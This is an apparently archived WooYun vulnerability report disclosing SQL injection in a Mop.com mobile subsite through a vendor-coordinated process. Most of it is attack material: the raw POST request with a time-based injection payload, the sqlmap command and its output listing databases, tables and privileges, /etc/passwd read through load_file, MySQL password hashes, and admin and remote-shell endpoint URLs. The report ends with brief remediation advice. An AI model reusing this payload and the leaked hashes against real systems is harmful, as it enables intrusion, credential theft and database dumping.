乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-15: 细节已通知厂商并且等待厂商处理中 2014-10-15: 厂商已经确认,细节仅向厂商公开 2014-10-25: 细节向核心白帽子及相关领域专家公开 2014-11-04: 细节向普通白帽子公开 2014-11-14: 细节向实习白帽子公开 2014-11-29: 细节向公众公开
猫扑某子站存在SQL注入漏洞,权限很大,影响多个数据库
payload:
POST /viewmessage_new.jsp?log=1&mypage=viewmessage_new.jsp&ufstr=141325665400905&uid=2042281654&uidt=2084414119&version=5 HTTP/1.1Content-Length: 143Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://m.mop.com:80/Cookie: mop3gVer=5; _mopwap_UID_T=2084414119; _mopwap_UVSTR=141325665400905; JSESSIONID=aaalWnp4J2Ntkf5YsQmKu; Hm_lpvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; Hm_lvt_c79a5e83b67cd45de49f406d0471da1b=1413257272; _mopwapuuid=b940d441-563a-407e-82d8-7a1396e7bf55; Host: m.mop.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
方法:
root@kali:~# sqlmap -r '/root/Desktop/2' --data="curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/"custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] nAre you sure you want to continue? [y/N] y
详细信息:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: email1 Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND 8260=8260 AND 'CKtN'='CKtN Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: curpage=1&email1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/' AND SLEEP(5) AND 'lire'='lire---[15:01:13] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.11[15:01:13] [INFO] fetching current database[15:01:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:01:13] [INFO] retrieved: [15:01:15] [WARNING] reflective value(s) found and filtering outmopcurrent database: 'mop'[15:01:29] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 13 times[15:01:29] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/m.mop.com'available databases [8]:[*] app[*] focus[*] information_schema[*] mop`[*] mysql[*] performance_schema[*] test[*] userlogcurrent user: 'wapuser@10.%'
Database: mop[211 tables]+-------------------------------------+| Login_MP_Receive || UserBusiness_201101 || UserBusiness_201102 || UserBusiness_201103 || UserBusiness_201104 || UserBusiness_201105 || UserBusiness_201106 || UserBusiness_201107 || UserBusiness_201108 || UserBusiness_201109 || UserBusiness_201110 || UserBusiness_201111 || UserBusiness_201112 || UserBusiness_201201 || UserBusiness_201202 || UserBusiness_201203 || UserBusiness_201204 || UserBusiness_201205 || UserBusiness_201206 || UserBusiness_201207 || UserBusiness_201208 || UserBusiness_201209 || UserBusiness_201210 || UserBusiness_201211 || UserBusiness_201212 || UserBusiness_201301 || UserBusiness_201302 || UserBusiness_201303 || UserBusiness_201304 || UserBusiness_201305 || UserBusiness_201306 || UserBusiness_201307 || UserBusiness_201308 || UserBusiness_201309 || UserBusiness_201310 || UserBusiness_201311 || UserBusiness_201312 || UserBusiness_201401 || UserBusiness_201402 || UserBusiness_201403 || UserBusiness_201404 || UserBusiness_201405 || UserBusiness_201406 || UserBusiness_201407 || UserBusiness_201408 || UserBusiness_201409 || UserBusiness_201410 || UserOperate_201201 || UserOperate_201202 || UserOperate_201203 || UserOperate_201204 || UserOperate_201205 || UserOperate_201206 || UserOperate_201207 || UserOperate_201208 || UserOperate_201209 || UserOperate_201210 || UserOperate_201211 || UserOperate_201212 || UserOperate_201301 || UserOperate_201302 || UserOperate_201303 || UserOperate_201304 || UserOperate_201305 || UserOperate_201306 || UserOperate_201307 || UserOperate_201308 || UserOperate_201309 || UserOperate_201310 || UserOperate_201311 || UserOperate_201312 || UserOperate_201401 || UserOperate_201402 || UserOperate_201403 || UserOperate_201404 || UserOperate_201405 || UserOperate_201406 || UserOperate_201407 || UserOperate_201408 || UserOperate_201409 || UserOperate_201410 || 3g_edit_sublist2 || 3g_edit_sublist || 3g_hotclick_info || 3g_hotclick_statistic || 3g_huodong_view || 3g_huodong_views_syn_list || 3g_huodong_views || 3g_investigate1_detail || 3g_tjzq_list_hisbak || 3g_tjzq_list || 3g_topRegion || 3gpet_enter || 3gpet_mm_record || admin_Lefttree || admin_data_review || admin_operator_permission |`| article || article_info || audit_images || audit_images_20100720 || audit_images_process || audit_images_source || baidu_keywords || business_detail || business_detail_20100720 || business_text || checkin || client_statistics || day_receive_login_mp || day_receive_login_mpBK1105 || day_statistic_normal || email_record || hi_send_log || hot_column || hozom_bind || huati_table || huati_table_tbak || huati_table_wcup || huodong_table_3g || image_monitor_log || ipdata || keywords_2009 || login_times_patch |`| mobile_area || mobile_bind || mobile_bind_tmp || mobile_up_message || monthData || mp_limit || mp_limit_dzh2 || mp_tmp || mp_tmp2 || mp_tmp_ok || passport_delete_user |`| passport_delete_user_1 || passport_delete_user_tmp || postReplyStatistics || progress || purge_pic_upload3_postimg1 || quote_reply || quote_reply2 || recent_subject || refere_login_temp || refere_reg_temp || refere_statistics || refere_statistics_temp || referer_domain || reg_login_num || reg_login_num2 || reg_login_num_week || register_return_dzh || register_return_dzh2 || register_return_dzh_week || request_header_info || request_header_notwap || send_feed || shualiang || shualiang_group || stat_page_href || statistic_back_login || statistic_login_idlist || statistic_reg_convert || statistic_reg_idlist || statistic_source || statistics || statistics_new || stockReward || subject_key || temp_focus || tmp_2 || topic_subject || torch_application || torch_union || unionSubReward || unionSubRewardRec || union_login_total || url_counter || usermessage |`| usermessage0 || usermessage_info || uv_statistics || wap_auth_user |`| wap_auth_user_path || wap_auth_user_temp || wap_auto_login || wap_auto_login20110907 || wap_auto_login_path || wap_hotclick_statistic || wap_site_info || wap_site_linkOutStatistics || wap_site_linkOutStatistics_baksLink || wap_site_statistics || wap_system_prop |`| wap_time_statistic || wap_user_equip || wap_user_ext || wap_user_mobile |`| wap_user_prop || wap_user_set || wap_user_telnum || wl_mobile_statistics || wl_statirtics || wl_time_statistics || wl_time_statistics_backup20120221 || wl_time_statistics_bak120531 || wl_time_statistics_bak121026 || wl_uv_statistics || xn_connector || xn_reg || xn_reg_bak_091104 |+-------------------------------------+
Database: mopTable: wap_auth_user[12 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| time | datetime || block_order | varchar(100) || block_show_num | varchar(100) || font_size | int(11) || login_key | varchar(200) || login_times | int(11) || mp | int(10) || show_num | int(11) || show_pic | int(11) || user_id | int(11) || user_name | varchar(100) || wc_show_num | int(11) |+----------------+--------------+
数据库权限以及范围:
database management system users privileges:[*] %% (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE privilege: USAGE[*] %beauty% [1]: privilege: REPLICATION SLAVE[*] %root% (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE[*] %slave% (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE[*] %wapuser% (administrator) [27]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE
select load_file('/etc/passwd');: 'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\narpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nuuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nnscd:x:28:28:NSCD Daemon:/:/sbin/nologin\nmysql:x:497:498:MySQL server:/var/lib/mysql:/bin/bash\n'
后台:
后台:http://m.mop.com/admin/login.jsp数据库帐号:<code>select user,password from mysql.user; [13]:[*] beauty, [*] wapuser, [*] slave, [*] wapuser, [*] slave, [*] wapuser, [*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F[*] root, *2726FA9A20F4078869AB791D5D12DF114D62CAFD[*] , *0A47FEBA14D5BD3E670DFAEF4EB3F4D506B4901F[*] root, *9DFF44DFF4007B348C4AC352751C6AAE5B562A8C[*] wapuser, *2726FA9A20F4078869AB791D5D12DF114D62CAFD
系统管理员入口:http://m.mop.com/test/server_rsh.jsp</code>可以拿到shell,也可以拖库<这两个都没做,不深入>
平常也喜欢逛猫扑,要是有个礼物就好了1,代码做好过滤2,数据库权限设置3,后台访问限制4,系统帐号限制,不然可以读到某些文件
危害等级:中
漏洞Rank:5
确认时间:2014-10-15 17:14
谢谢,非常感谢!
暂无